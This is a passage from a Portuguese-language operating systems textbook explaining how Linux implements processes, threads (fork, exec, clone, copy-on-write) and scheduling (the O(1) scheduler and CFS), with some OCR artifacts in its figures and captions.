Às vezes ocorre de um processo não ter nada para 
fazer até a chegada de um sinal. Por exemplo, considere 
um programa de computador para a instrução de estu- 
dantes e que está testando a velocidade e a compreensão 
de leitura. Ele exibe algum texto na tela e então chama 
alarm para sinalizá-lo após 30 segundos. Enquanto o 
estudante está lendo o texto, o programa não tem nada 
para fazer. Ele poderia aguardar em um laço estreito 
sem fazer nada, mas isso seria um desperdício do tempo 
da CPU que um processo de segundo plano ou outro 
usuário poderia precisar. Uma solução melhor é usar a 
chamada de sistema pause, que diz ao Linux para sus- 
pender o processo até a chegada do próximo sinal. Ai do 
programa que chame pause sem um alarme pendente. 


10.3.3 Implementação de processos e threads no 
Linux 


Um processo no Linux é como um iceberg: você vê 
somente a parte acima da água, mas há também uma par- 
te importante por baixo. Todo processo tem uma parte do 
usuário que executa o programa do usuário. No entanto, 
quando um dos seus threads faz uma chamada de siste- 
ma, ele chaveia para o modo núcleo e começa a executar 
em contexto núcleo, com um mapa de memória diferente 
e acesso absoluto a todos os recursos de máquina. Ainda 
é o mesmo thread, mas agora com mais potência e sua 
própria pilha de modo núcleo e contador de programa de 
modo núcleo. Esses recursos são importantes, pois uma 
chamada de sistema pode ser bloqueada no meio do ca- 
minho, por exemplo, esperando que uma operação de 
disco seja concluída. O contador de programa e os regis- 
tradores são então salvos de maneira que o thread possa 
ser reinicializado em modo núcleo mais tarde. 

O núcleo Linux representa internamente processos 
como tarefas, por meio da estrutura task struct. Di- 
ferentemente de outras abordagens de sistemas opera- 
cionais (que fazem uma distinção entre um processo, 
processo peso-leve e thread), o Linux usa a estrutura de 
tarefas para representar qualquer contexto de execução. 
Portanto, um processo de thread único será represen- 
tado com uma estrutura de tarefa, e um processo com 
múltiplos threads terá uma estrutura de tarefas para cada 
um dos threads ao nível de usuário. Por fim, o núcleo 
em si tem múltiplos threads, e tem threads no nível do 
núcleo que não estão associados com qualquer processo 
do usuário e estão executando código do núcleo. Re- 
tornaremos ao tratamento de processos com múltiplos 
threads (e threads em geral) mais tarde nesta seção. 
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Para cada processo, um descritor de processos do tipo 
task_struct está residente na memória a todo momento. 
Ele contém informações vitais necessárias para o ge- 
renciamento de núcleo de todos os processos, incluindo 
parâmetros de escalonamento, listas de descritores de 
arquivos abertos, e assim por diante. O descritor de pro- 
cesso junto com a memória para a pilha de modo núcleo 
para o processo são criados junto com o processo. 

Buscando a compatibilidade com outros sistemas 
UNIX, o Linux identifica os processos via PID. O 
núcleo organiza todos os processos em uma lista du- 
plamente encadeada de estruturas de tarefas. Além de 
acessar descritores de processos percorrendo as listas 
encadeadas, o PID pode ser mapeado para o endereço 
da estrutura de tarefas, e a informação do processo pode 
ser acessada imediatamente. 

A estrutura de tarefas contém uma série de campos. 
Alguns desses campos contêm ponteiros para outras es- 
truturas de dados ou segmentos, como aqueles conten- 
do informações sobre arquivos abertos. Alguns desses 
segmentos são relacionados com a estrutura ao nível 
do usuário do processo, a qual não interessa quando o 
processo do usuário não está executável. Portanto, eles 
podem ser retirados ou paginados da memória, a fim de 
não desperdiçar memória com informações que não são 
necessárias. Por exemplo, embora seja possível que um 
sinal seja enviado a um processo enquanto ele não está 
na memória, não é possível que ele leia um arquivo. Por 
essa razão, informações sobre sinais devem estar na me- 
mória o tempo inteiro, mesmo quando o processo não 
está presente na memória. Por outro lado, informações 
sobre descritores de arquivos podem ser mantidas na es- 
trutura do usuário e trazidas somente quando o processo 
está na memória e é executável. 

As informações contidas no descritor do processo 
caem em uma série de categorias amplas que podem ser 
descritas aproximadamente como a seguir: 


1. Parâmetros de escalonamento. Prioridade de 
processo, quantidade de tempo de CPU consumi- 
da recentemente, quantidade de tempo gasta em 
modo s/eep recentemente. Em conjunto, estes são 
usados para determinar qual processo executar 
em seguida. 

2. Imagem de memória. Ponteiros para os segmen- 
tos de texto, dados e pilha, ou tabelas de pági- 
nas. Se o segmento de texto for compartilhado, 
o ponteiro de texto aponta para a tabela de tex- 
to compartilhada. Quando o processo não está 
na memória, informações sobre como encontrar 
suas partes no disco estão aqui também. 
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3. Sinais. Máscaras mostrando quais sinais estão 
sendo ignorados, quais estão sendo capturados, 
quais estão sendo temporariamente bloqueados e 
quais estão no processo de serem entregues. 

4. Registradores de máquina. Quando ocorre um 
desvio para o núcleo, os registradores de máqui- 
na (incluindo os de ponto flutuante, se usados) 
são salvos aqui. 

5. Estado da chamada de sistema. Informações 
sobre a chamada de sistema atual, incluindo os 
parâmetros e resultados. 

6. Tabela de descritores de arquivos. Quando uma 
chamada de sistema envolvendo um descritor de 
arquivo é invocada, o descritor de arquivo é usa- 
do como um índice nessa tabela para localizar a 
estrutura de dados na memória (i-node) corres- 
pondente a esse arquivo. 

7. Contabilidade. Ponteiro para uma tabela que 
controla o tempo de CPU do sistema e do usuário 
usado pelo processo. Alguns sistemas mantêm li- 
mites aqui na quantidade de tempo de CPU que 
um processo pode usar, o tamanho máximo da 
sua pilha, o número de quadros de páginas que 
ele pode consumir e outros itens. 

8. Pilha do núcleo. Uma pilha fixa a ser usada pela 
parte do núcleo do processo. 

9. Miscelânea. Estado do processo atual, evento 
sendo esperado, se algum, tempo até o relógio do 
alarme disparar, PID, PID do processo pai e iden- 
tificação do usuário e do grupo. 


Mantendo essas informações em mente, é fácil ex- 
plicar agora como os processos são criados no Linux. 
O mecanismo para criar um novo processo na realidade 
é relativamente direto. Um novo descritor de processo 
e área do usuário são criados para o processo filho e 
preenchidos principalmente com dados do pai. O filho 
recebe um PID, seu mapa de memória é configurado e 
ele recebe um acesso compartilhado aos arquivos do seu 
pai. Então seus registradores são configurados e ele está 
pronto para executar. 

Quando uma chamada de sistema fork é executada, 
o processo chamador chaveia para o núcleo e cria uma 
estrutura de tarefa e algumas outras estruturas de dados 
de acompanhamento, como a pilha de modo núcleo e 
a estrutura thread info. Essa estrutura é alocada a uma 
distância fixa do fim da pilha do processo, e contém 
alguns parâmetros do processo, junto com o endereço 
do descritor do processo. Ao armazenar o endereço do 
descritor de processo em um local fixo, o Linux precisa 
de somente algumas operações eficientes para localizar 
a estrutura de tarefa para um processo em execução. 


A maioria dos conteúdos de descritores de processos 
está preenchida com base nos valores do descritor do 
pai. O Linux então procura por um PID disponível, isto 
é, não um atualmente em uso por qualquer processo, e 
atualiza a entrada da tabela de resumo PID para apontar 
para a nova estrutura de tarefas. No caso de colisões na 
tabela de espalhamento, os descritores de processo po- 
dem ser encadeados. Ele também configura os campos 
no task struct para apontar para o processo anterior/se- 
guinte correspondente no conjunto de tarefas. 

Em princípio, ele deve alocar agora memória para os 
segmentos de dados e de pilha do filho, e fazer cópias 
exatas dos segmentos do pai, dado que a semântica de 
fork diz que nenhuma memória é compartilhada entre 
pai e filho. O segmento de texto pode ser copiado ou 
compartilhado, pois ele é somente de memória. A essa 
altura, o filho está pronto para executar. 

No entanto, copiar a memória é caro, então todos 
os sistemas Linux modernos trapaceiam. Eles dão ao 
filho suas próprias tabelas de páginas, mas fazem que 
elas apontem para as páginas dos pais, marcadas ape- 
nas como somente leitura. Sempre que qualquer um dos 
processos (o filho ou o pai) tenta escrever em uma pá- 
gina, ele obtém um erro de proteção. O núcleo vê isso 
e então aloca uma nova cópia da página para o proces- 
so que gerou a falta e o marca como de leitura/escrita. 
Dessa maneira, páginas apenas como que são realmente 
escritas precisam ser copiadas. Esse mecanismo é cha- 
mado de copiar na escrita (copy on write). Ele tem o 
benefício adicional de não exigir duas cópias do progra- 
ma na memória, desse modo, salvando RAM. 

Após o processo filho começar a executar, o código 
executando ali (uma cópia do shell em nosso exemplo) 
faz uma chamada de sistema exec dando o nome do co- 
mando como um parâmetro. O núcleo agora encontra e 
verifica o arquivo executável, copia os argumentos e ca- 
deias de ambiente para o núcleo e libera o antigo espaço 
de endereçamento e suas tabelas de página. 

Agora o novo espaço de endereçamento deve ser cria- 
do e preenchido. Se o sistema suporta arquivos mapeados, 
como o Linux e virtualmente todos os outros sistemas 
baseados no UNIX o fazem, as novas tabelas de pági- 
nas são configuradas para indicar que nenhuma página 
está na memória, exceto talvez uma página de pilha, mas 
que o espaço de endereçamento tem o suporte do arquivo 
executável no disco. Quando o novo processo começa a 
executar, ele imediatamente gerará uma falta de página, 
que fará que a primeira página do código seja pagina- 
da do arquivo executável. Dessa maneira, nada precisa 
ser carregado antecipadamente, portanto os programas 
podem começar rapidamente e falhar somente naquelas 


páginas que eles precisam e não mais. (Essa estratégia 
é realmente apenas a paginação de demanda na sua for- 
ma mais pura, como discutimos no Capítulo 3.) Por fim, 
os argumentos e strings de ambiente são copiados para a 
nova pilha, os sinais são reconfigurados e os registrado- 
res são inicializados todos para zero. A essa altura, o novo 
comando pode começar a executar. 

A Figura 10.8 ilustra os passos que acabamos de des- 
crever pelo exemplo a seguir: um usuário digita um co- 
mando, Is, no terminal, e o shell cria um novo processo 
igual a si mesmo. O novo shell então chama exec para 
sobrepor sua memória com os conteúdos do arquivo 
executável /s. Após isso, /s pode inicializar. 


Threads no Linux 


Discutimos threads de maneira geral no Capítulo 2. 
Aqui focaremos nos threads de núcleo no Linux, particu- 
larmente nas diferenças entre o modelo de thread do Linux 
e outros sistemas UNIX. A fim de compreender melhor as 
capacidades únicas fornecidas pelo modelo Linux, come- 
çamos com uma discussão de algumas decisões desafia- 
doras presentes em sistemas com múltiplos threads. 

A principal questão ao se introduzir threads é man- 
ter a semântica UNIX tradicional correta. Primeiro 
considere fork. Suponha que um processo com múlti- 
plos threads (de núcleo) realiza uma chamada de sis- 
tema fork. Todos os outros threads devem ser criados 
no novo processo? Por ora, vamos responder a essa 
questão com um sim. Suponha que um desses threads 
tenha sido bloqueado lendo a partir do teclado. O thread 


Capítulo 10 ESTUDO DE CASO 1: UNIX, LINUX E ANDROID | 513 


correspondente no novo processo também deve ser blo- 
queado lendo do teclado? Se a resposta for sim, qual 
deles tem a proxima linha digitada? Se nao, 0 que esse 
thread deveria estar fazendo no novo processo? 

O mesmo problema se mantém para muitas outras 
coisas que os threads podem fazer. Em um processo 
com um único thread, o problema não surge, pois o 
único thread não pode ser bloqueado quando chamando 
fork. Agora considere o caso em que os outros threads 
não são criados no processo filho. Suponha que um dos 
threads não criados seja detentor de um mutex que o 
único thread do novo processo tenta obter após a cha- 
mada a fork. O mutex jamais será liberado e o único 
thread ficará pendurado para sempre. Há inúmeros ou- 
tros problemas também. Não há solução simples. 

E/S de arquivos é outra área que apresenta proble- 
mas. Suponha que um thread esteja bloqueado lendo de 
um arquivo e outro thread fecha o arquivo ou faz uma 
Iseek para mudar o ponteiro de arquivo atual. O que 
acontece em seguida? Quem sabe? 

O tratamento de sinais é outra questão complicada. 
Os sinais devem ser direcionados a um thread espe- 
cífico ou apenas ao processo? Um SIGFPE (exceção 
de ponto flutuante) deve provavelmente ser pego pelo 
thread que o causou. E se ele não o pegar? Só esse thread 
deve ser eliminado, ou todos os threads? Agora consi- 
dere o sinal SIGINT, gerado pelo usuário no teclado. 
Qual thread deve capturar isso? Todos os threads de- 
vem compartilhar um conjunto comum de máscaras de 
sinais? Todas as soluções para esses e outros problemas 
normalmente fazem que algo quebre em alguma parte. 


a (cles TEE: Os passos na execução do comando Is digitado para o shell. 


PID = 501 


1. Chamada fork 


Código do fork 


Aloca estrutura de tarefa do filho 

Preenche estrutura de tarefa do filho com dados do pai 
Aloca pilha e área de usuário para o filho 

Preenche a área de usuário do filho com dados do pai 
Aloca PID para o filho 

Ajusta filho para compartilhar código do pai 

Copia tabelas de páginas para dados e pilha 

Ajusta compartilhamento de arquivos abertos 

Copia registradores do pai para o filho 


PID = 748 





PID = 748 


3. Chamada exec 
4. sh sobreposto 


por Is 
Código do exec 


Encontra o programa executável 


Verifica a permissão de execução 


Lê e verifica o cabeçalho 


Copia argumentos e variáveis de ambiente para o núcleo 


Libera o antigo espaço de endereçamento 


Aloca novo espaço de endereçamento 
Copia argumentos e variáveis de ambiente para a pilha 


Reinicializa os sinais 
Inicializa os registradores 
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Acertar a semântica dos threads (sem mencionar o có- 
digo) é algo sério. 

O Linux dá suporte a threads de núcleo de uma 
maneira interessante que vale a pena ser analisada. A 
implementação é baseada em ideias do 4.4BSD, mas 
threads de núcleo não foram capacitados naquela dis- 
tribuição porque Berkeley ficou sem dinheiro antes que 
a biblioteca C pudesse ser reescrita para solucionar os 
problemas que acabamos de discutir. 

Historicamente, processos eram contêineres de re- 
cursos e threads eram as unidades de execução. Um pro- 
cesso continha um ou mais threads que compartilhavam 
o espaço de endereçamento, arquivos abertos, tratado- 
res de sinais, alarmes e tudo mais. Tudo estava claro e 
simples como descrito. 

Em 2000, o Linux introduziu uma nova chamada de 
sistema poderosa, clone, que dificultou a distinção entre 
processos e threads e possivelmente chegou a inverter a 
primazia dos dois conceitos. Clone não está presente em 
nenhuma outra versão de UNIX. Classicamente, quando 
um novo thread era criado, o(s) thread(s) original(ais) e 
o novo compartilhavam tudo, exceto seus registradores. 
Em particular, descritores de arquivos para arquivos 
abertos, tratadores de sinais, alarmes e outras proprie- 
dades globais eram por processo, não por thread. O que 
a chamada clone fez foi tornar possível para cada um 
desses aspectos estar relacionado a um processo especi- 
fico ou thread específico. Ela é chamada como a seguir: 


pid = clone(function, stack ptr, sharing flags, arg); 


A chamada cria um novo thread, seja no processo atu- 
al ou em um novo, dependendo do sharing flags. Se o 
novo thread está no processo atual, ele compartilha o es- 
paço de endereçamento com os threads existentes, e toda 
escrita subsequente para qualquer byte no espaço de en- 
dereçamento por qualquer thread é imediatamente visível 
para todos os outros threads no processo. Por outro lado, 
se o espaço de endereçamento não for compartilhado, 
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então o novo thread recebe uma cópia exata do espaço 
de endereçamento, mas escritas subsequentes pelo novo 
thread não são visíveis para os antigos. Essas semânticas 
são as mesmas de fork do POSIX. 

Em ambos os casos, o novo thread começa execu- 
tando em function, que é chamado com arg como seu 
único parâmetro. Também em ambos os casos, o novo 
thread obtém sua própria pilha privada, com o ponteiro 
da pilha inicializado para stack ptr. 

O parâmetro sharing flags é um mapa de bits que 
permite uma granularidade mais fina de compartilha- 
mento do que os sistemas UNIX tradicionais. Cada um 
dos bits pode ser configurado independentemente dos 
outros, e cada um deles determina se o novo thread co- 
pia alguma estrutura de dados ou a compartilha com o 
thread chamador. A Figura 10.9 mostra alguns dos itens 
que podem ser compartilhados ou copiados de acordo 
com os bits em sharing flags. 

O bit CLONE VM determina se a memória virtual 
(isto é, espaço de endereçamento) é compartilhada pe- 
los antigos threads ou copiada. Se o bit for marcado, 
o thread novo simplesmente é inserido com os threads 
existentes, de maneira que a chamada clone efetiva- 
mente cria um thread novo em um processo existente. 
Se o bit for limpo, o thread novo recebe seu próprio 
espaço de endereçamento privado. Ter o seu próprio 
espaço de endereçamento significa que o efeito das 
suas instruções STORE não é visível para os threads 
existentes. Esse comportamento é similar a fork, exce- 
to como observado a seguir. Criar um novo espaço de 
endereçamento é efetivamente a definição de um novo 
processo. 

O bit CLONE FS controla o compartilhamento 
dos diretórios raiz e de trabalho, assim como da flag 
umask. Mesmo que o novo thread tenha seu próprio 
espaço de endereçamento, se esse bit for marcado, os 
threads novos e antigos compartilham os diretórios de 
trabalho. Isso significa que uma chamada para chdir por 











Flag Significado quando marcado Significado quando limpo 
CLONE VM Cria um novo thread Cria um novo processo 
CLONE FS Compartilha umask e os diretórios-raiz e de Não compartilha umask e os diretórios-raiz e 
trabalho de trabalho 
CLONE FILES Compartilha os descritores de arquivos Copia os descritores de arquivos 





CLONE SIGHAND 


Compartilha a tabela do tratador de sinais 


Copia a tabela do tratador de sinais 











CLONE PARENT 








O novo thread tem o mesmo pai que o chamador 


O chamador é o pai do novo thread 











um thread muda o diretório de trabalho do outro thread, 
mesmo que este outro possa ter seu próprio espaço de 
endereçamento. Em UNIX, uma chamada para chdir por 
um thread sempre muda o diretório de trabalho para ou- 
tros threads no seu processo, mas nunca para threads em 
outro processo. Desse modo, esse bit capacita um tipo 
de compartilhamento que não é possível em versões do 
UNIX tradicionais. 

O bit CLONE FILES é análogo ao bit CLONE FS. 
Se marcado, o novo thread compartilha seus descritores 
de arquivos com os antigos, então chamadas para Iseek 
por um thread são visíveis para os outros, novamente 
como em geral funciona para threads dentro do mesmo 
processo, mas não para threads em processos diferen- 
tes. De modo similar, CLONE SIGHAND habilita ou 
desabilita o compartilhamento da tabela de tratadores 
de sinais entre os threads novos e antigos. Se a tabela 
for compartilhada, mesmo entre threads em diferentes 
espaços de endereçamento, então mudar um tratador em 
um thread afeta os tratadores em outros. 

Por fim, cada processo tem um pai. O bit CLO- 
NE PARENT controla quem é o pai do novo thread. Ele 
pode ser o mesmo que o thread chamador (caso em que 
o novo thread é um irmão do chamador) ou pode ser o 
próprio chamador. Há alguns outros bits que controlam 
outros itens, mas eles são menos importantes. 

Esse compartilhamento de granularidade fina é pos- 
sível porque o Linux mantém estruturas de dados se- 
paradas para os vários itens listados na Seção 10.3.3 
(parâmetros de escalonamento, imagem de memória e 
assim por diante). A estrutura de tarefa apenas aponta 
para essas estruturas de dados, de maneira que é fácil 
fazer uma nova estrutura de tarefas para cada thread 
clonado e fazê-la apontar para as estruturas de dados de 
escalonamento, memória e outras do antigo thread, ou 
para cópias delas. O fato de que tal compartilhamento 
de granularidade fina é possível não significa que ele 
seja útil, no entanto, especialmente tendo em vista que 
as versões do UNIX tradicionais não oferecem essa fun- 
cionalidade. Um programa Linux que tira vantagem dis- 
so não pode mais ser levado para o UNIX. 

O modelo de threads do Linux apresenta outra difi- 
culdade. Sistemas UNIX associam um único PID com 
um processo, independente se ele tem um único ou múl- 
tiplos threads. A fim de ser compatível com outros sis- 
temas UNIX, o Linux distingue entre um identificador 
de processo (PID) e um identificador de tarefas (TID). 
Ambos os campos são armazenados na estrutura de ta- 
refas. Quando clone é usado para criar um novo pro- 
cesso que não compartilha nada com o seu criador, PID 
é configurado para um novo valor; de outra maneira, 
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a tarefa recebe um novo TID, mas herda o PID. Dessa 
maneira, todos os threads em um processo receberão o 
mesmo PID que o primeiro thread no processo. 


10.3.4 Escalonamento no Linux 


Examinaremos agora o algoritmo de escalonamen- 
to do Linux. Para começar, os threads do Linux são de 
núcleo, de maneira que o escalonamento é baseado em 
threads, não processos. 

O Linux distingue três classes de threads para fins de 
escalonamento: 


1. FIFO em tempo real. 
2. Escalonamento circular em tempo real. 
3. Tempo compartilhado. 


Threads do tipo FIFO em tempo real são os de prio- 
ridade mais alta e não sofrem preempção exceto por um 
thread FIFO em tempo real recentemente pronto com 
uma prioridade mais alta. Threads de escalonamento cir- 
cular em tempo real são os mesmos que os threads FIFO 
em tempo real, exceto que eles têm um quanta de tempo 
associado a eles e são passíveis de preempção pelo reló- 
gio. Se múltiplos threads de escalonamento circular em 
tempo real estão prontos, cada um é executado durante o 
seu quantum, após o qual ele volta durante fim da lista de 
threads de escalonamento circular em tempo real. Nenhu- 
ma dessas classes é realmente em tempo real de qualquer 
maneira. Limites de tempo não podem ser especificados 
e garantias não são dadas. Essas classes simplesmente 
têm uma prioridade mais alta do que os threads na classe 
de tempo compartilhado padrão. A razão de o Linux as 
chamar em tempo real é que o Linux está em conformi- 
dade com o padrão P1003.4 (extensões em “tempo real” 
para o UNIX) que usa esses nomes. Os threads em tempo 
real são internamente representados por níveis de priori- 
dade de 0 a 99, sendo 0 o nível de prioridade em tempo 
real mais alto e 99 o mais baixo. 

Os threads convencionais, não em tempo real, for- 
mam uma classe em separado e são escalonados por um 
algoritmo diferente, de maneira que não competem com 
os threads em tempo real. Internamente, esses threads 
são associados com níveis de prioridade de 100 a 139, 
isto é, o Linux distingue internamente entre 140 níveis 
de prioridade (para tarefas em tempo real ou não). As- 
sim como para threads de escalonamento circular em 
tempo real, o Linux aloca tempo de CPU para as tarefas 
que não são em tempo real com base em suas exigências 
e níveis de prioridade. 

No Linux, o tempo é mensurado como o número de 
ciclos do relógio. Em versões mais antigas, o relógio 
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funcionava a 1.000 Hz e cada ciclo levava 1 ms, cha- 
mado de um instante (jiffy). Em versões mais novas, a 
frequência do ciclo pode ser configurada para 500, 250 
ou mesmo 1 Hz. A fim de evitar desperdiçar ciclos da 
CPU para servir a interrupção do timer, o núcleo pode 
até ser configurado em modo “sem ciclo”. Isso é útil 
quando há apenas um processo executando no sistema, 
ou quando a CPU está ociosa e precisa entrar no modo 
de economia de energia. Por fim, em sistemas mais no- 
vos, temporizadores de alta resolução permitem que o 
núcleo controle o tempo em granularidade subinstante. 

Assim como a maioria dos sistemas UNIX, o Li- 
nux associa um valor nice com cada thread. O padrão 
é 0, mas isso pode ser modificado usando a chama- 
da de sistema nice(value), onde o valor varia de —20 
a +19. Esse valor determina a prioridade estática de 
cada thread. Um usuário calculando m com um bilhão de 
casas decimais no segundo plano poderia colocar essa 
chamada em seu programa para ser bacana com os ou- 
tros usuários. Apenas o administrador do sistema pode 
pedir por um serviço melhor do que o normal (signifi- 
cando valores de —20 a —1). Deduzir a razão para essa 
regra é deixado como um exercício para o leitor. 

Em seguida, descreveremos em mais detalhes dois 
dos algoritmos de escalonamento do Linux. Seu funcio- 
namento interno é relacionado de perto com o projeto 
da fila de execução (runqueue), uma estrutura de da- 
dos fundamental usada pelo escalonador para controlar 
todas as tarefas executáveis no sistema e selecionar a 
seguinte a ser executada. Uma fila de execução é asso- 
ciada com cada CPU no sistema. 

Historicamente, um escalonador popular do Linux 
foi o escalonador O(1). Ele recebeu esse nome por- 
que era capaz de realizar operações de gerenciamento 
de tarefas, como selecionar uma tarefa ou colocar uma 
tarefa na fila de execuções, em tempo constante, inde- 
pendentemente do número total de tarefas no sistema. 
No escalonador O(1), a fila de execução é organizada 
em dois arranjos, ativo e expirado. Como mostrado na 
Figura 10.10(a), cada um desses é um arranjo de 140 
cabeçalhos de listas, cada qual correspondendo a uma 
prioridade diferente. Cada cabeçalho de lista aponta 
para uma lista duplamente encadeada de processos em 
uma determinada prioridade. A operação básica do es- 
calonador pode ser descrita como a seguir. 

O escalonador escolhe uma tarefa da lista de priori- 
dade mais alta no arranjo ativo. Se a fatia de tempo — 
quantum — expirar, ela é movida para a lista expirada 
(potencialmente em um nível de prioridade diferente). 
Se a tarefa é bloqueada, por exemplo, para esperar por 
um evento de E/S, antes que sua fatia de tempo expire, 


uma vez que o evento ocorra e sua execução possa ser 
retomada, ela é colocada de volta no arranjo ativo origi- 
nal, e sua fatia de tempo é decrementada para refletir o 
tempo de CPU já usado. Assim que sua fatia de tempo 
tenha sido totalmente exaurida, ela também será colo- 
cada no arranjo expirado. Quando não há mais tarefas 
no arranjo ativo, o escalonador simplesmente troca os 
ponteiros, de maneira que os arranjos de tarefas expira- 
das agora tornam-se de ativas e vice-versa. Esse método 
assegura que as tarefas de baixa prioridade não entrem 
em inanição (exceto quando os threads FIFO em tempo 
real tomam totalmente a CPU, o que é improvável). 

Aqui, a diferentes níveis de prioridade são designados 
diferentes valores de fatias de tempo, com quanta mais 
altos designados para processo de prioridade mais alta. 
Por exemplo, tarefas executando a um nível de prioridade 
100 receberão quanta de tempo de 800 ms, enquanto tare- 
fas ao nível de prioridade de 139 receberão 5 ms. 

A ideia por trás desse esquema é tirar processos do 
núcleo rápido. Se um processo está tentando ler um ar- 
quivo de disco, fazê-lo esperar um segundo entre cha- 
madas read vai atrasá-lo terrivelmente. É muito melhor 
deixá-lo executar de imediato após cada solicitação ter 
sido completa, de maneira que ele possa fazer a próxi- 
ma rapidamente. De maneira similar, se um processo 
foi bloqueado esperando por uma entrada do teclado, 
trata-se claramente de um processo interativo e, como 
tal, deve ser designada uma alta prioridade tão logo ele 
esteja pronto a fim de assegurar que os processos intera- 
tivos recebam um bom serviço. Sob essa ótica, proces- 
sos limitados pela CPU basicamente recebem qualquer 
serviço que sobrou quando todos os processos interati- 
vos e limitados por E/S são bloqueados. 

Como o Linux (ou qualquer outro SO) não sabe de 
antemão se uma tarefa é limitada por E/S ou CPU, ele 
se baseia em manter continuamente a heurística da in- 
teratividade. Dessa maneira, o Linux distingue entre a 
prioridade estática e dinâmica. A prioridade dinâmica 
do thread é continuamente recalculada, de maneira a 
(1) recompensar threads interativos e (2) punir threads que 
tomam conta da CPU. No escalonador O(1), o bônus 
de prioridade máxima é —5, tendo em vista que valores 
de prioridade mais baixa correspondem à prioridade 
mais alta recebida pelo escalonador. A penalidade de 
prioridade máxima é +5. O escalonador mantém uma 
variável sleep avg associada com cada tarefa. Sempre 
que uma tarefa é desperta, essa variável é incrementa- 
da. Sempre que uma variável passa por preempção ou 
seu quantum expira, essa variável é decrementada pelo 
valor correspondente. Esse valor é usado para mapear 
dinamicamente o bônus da tarefa para valores de —5 a 
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alelo TENS Exemplo das estruturas de dados de fila de execução do Linux para (a) o escalonador O(1) Linux e (b) o Escalonador 


Completamente Justo (Completely Fair Scheduler). 


Flags 

CPU 
Prioridade estática 

<...> 








Arranjo[1] 





(a) Fila de execução por CPU 
no escalonador Linux O(1) 


+5. O escalonador recalcula o novo nivel de prioridade 
à medida que um thread é movido da lista ativa para 
expirada. 

O algoritmo de escalonamento O(1) refere-se ao es- 
calonador tornado popular nas versões do núcleo 2.6, 
e foi introduzido pela primeira vez no núcleo 2.5 ins- 
tável. Algoritmos anteriores exibiam um desempenho 
ruim em configurações de multiprocessadores e não se 
adequavam bem ao número crescente de tarefas. Tendo 
em vista que a descrição apresentada nos parágrafos an- 
teriores indica que uma decisão de escalonamento pode 
ser tomada por meio do acesso à lista ativa apropriada, 
ela pode ser feita em tempo O(1) constante, indepen- 
dente do número de processos no sistema. No entanto, 
apesar da propriedade desejável da operação em tempo 
constante, o escalonador O(1) tem pontos fracos signifi- 
cativos. Mais notavelmente, a heurística usada para de- 
terminar a interatividade de uma tarefa e, portanto, seu 
nível de prioridade, era complexa e imperfeita e resul- 
tou em um desempenho ruim para as tarefas interativas. 

Para lidar com essa questão, Ingo Molnar, que tam- 
bém criou o escalonador O(1), propôs um novo esca- 
lonador chamado Escalonador Completamente Justo 
(Completely Fair Scheduler — ou CFS). O CFS foi 
baseado em ideias originalmente desenvolvidas por 






































(b) Árvore rubro-negra (red-black tree) 
no escalonador CFS. 


Con Kolivas para um escalonador anterior, e foi integra- 
do pela primeira vez no lançamento 2.6.23 do núcleo. 
Ele ainda é o escalonador padrão para tarefas que não 
sejam em tempo real. 

A principal ideia por trás do CFS é usar a árvore 
rubro-negra (red-black tree) como a estrutura de da- 
dos de fila de execução. As tarefas são ordenadas na 
árvore com base na quantidade de tempo que elas pas- 
sam executando na CPU, chamado de vruntime. O CFS 
contabiliza o tempo de execução das tarefas com uma 
granularidade de nanossegundos. Como mostrado na 
Figura 10.10(b), cada nodo interno na árvore corres- 
ponde a uma tarefa. Os filhos à esquerda correspondem 
às tarefas que tiveram menos tempo na CPU e, portan- 
to, serão escalonadas mais cedo, e os filhos à direita no 
nodo são aquelas que consumiram mais tempo de CPU 
até aqui. As folhas na árvore não exercem papel algum 
no escalonador. 

O algoritmo de escalonamento pode ser resumido 
como a seguir: o CFS sempre escalona a tarefa que tem 
a menor quantidade de tempo na CPU, tipicamente o 
nodo mais à esquerda na árvore. Periodicamente, o CFS 
incrementa o valor de vruntime da tarefa baseado no 
tempo que ele já executou, e compara isso com o nó 
mais à esquerda atual na árvore. Se a tarefa em execução 
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ainda tem um vruntime menor, ela vai continuar a exe- 
cutar. De outra maneira, ela sera inserida no lugar apro- 
priado na árvore rubro-negra, e a CPU receberá a tarefa 
correspondente ao novo nodo mais à esquerda. 

Para justificar as diferenças em prioridades de tare- 
fas e valores nice, o CFS muda a taxa efetiva na qual 
o tempo virtual da tarefa passa quando ela está execu- 
tando na CPU. Para tarefas de prioridade mais baixa, 
o tempo passa mais depressa, seu valor de vruntime 
aumentará mais rapidamente e, dependendo das outras 
tarefas no sistema, eles perderão a CPU e serão reinse- 
ridos na árvore mais cedo do que o seriam se tivessem 
um valor de prioridade mais alto. Dessa maneira, o CFS 
evita ter de usar estruturas de fila de execução separadas 
para diferentes níveis de prioridade. 

Em resumo, selecionar um nodo para executar pode 
ser feito em tempo constante, enquanto inserir uma ta- 
refa na fila de execução é feito no tempo O(log(N)), em 
que N é o número de tarefas no sistema. Dados os níveis 
de carga nos sistemas atuais, isso continua a ser aceitá- 
vel, mas à medida que a capacidade computacional dos 
nodos e o número de tarefas que eles podem executar 
aumentam, particularmente no espaço do servidor, é 
possível que novos algoritmos de escalonamento sejam 
propostos no futuro. 

Além do algoritmo de escalonamento básico, o es- 
calonador do Linux inclui características especiais 
particularmente úteis para plataformas de multiproces- 
sadores ou multinúcleos. Primeiro, a estrutura de fila 
de execução é associada com cada CPU na plataforma 
multiprocessadora. O escalonador tenta manter os be- 
nefícios do escalonamento por afinidade e escalonar 
tarefas na CPU nas quais eles estavam executando pre- 
viamente. Segundo, um conjunto de chamadas de siste- 
ma está disponível para especificar ou modificar mais 
ainda as exigências de afinidade de uma thread selecio- 
nada. Por fim, o escalonador realiza um balanceamen- 
to de carga periódico através das filas de execução de 
diferentes CPUs para assegurar que a carga do sistema 
esteja bem equilibrada, enquanto ainda atende a deter- 
minadas exigências de desempenho ou afinidade. 

O escalonador considera apenas tarefas executáveis, 
que são colocadas na fila de execução apropriada. Ta- 
refas que não estão executáveis e estão esperando em 
várias operações de E/S ou outros eventos do núcleo são 
colocadas em outra estrutura de dados, a fila de espera. 
Uma fila de espera está associada com cada evento pelo 
qual as tarefas talvez tenham de esperar. O cabeçalho da 
fila de espera inclui um ponteiro para uma lista encade- 
ada de tarefas e uma trava giratória. A trava giratória é 
necessária para assegurar que a fila de espera possa ser 


manipulada concorrentemente tanto pelo código princi- 
pal do núcleo quanto pelos tratadores de interrupção ou 
outras invocações assíncronas. 


Sincronização no Linux 


Na seção anterior, mencionamos que o Linux usa tra- 
vas giratórias para evitar modificações concorrentes a 
estruturas de dados como filas de espera. Na realidade, o 
código do núcleo contém variáveis de sincronização em 
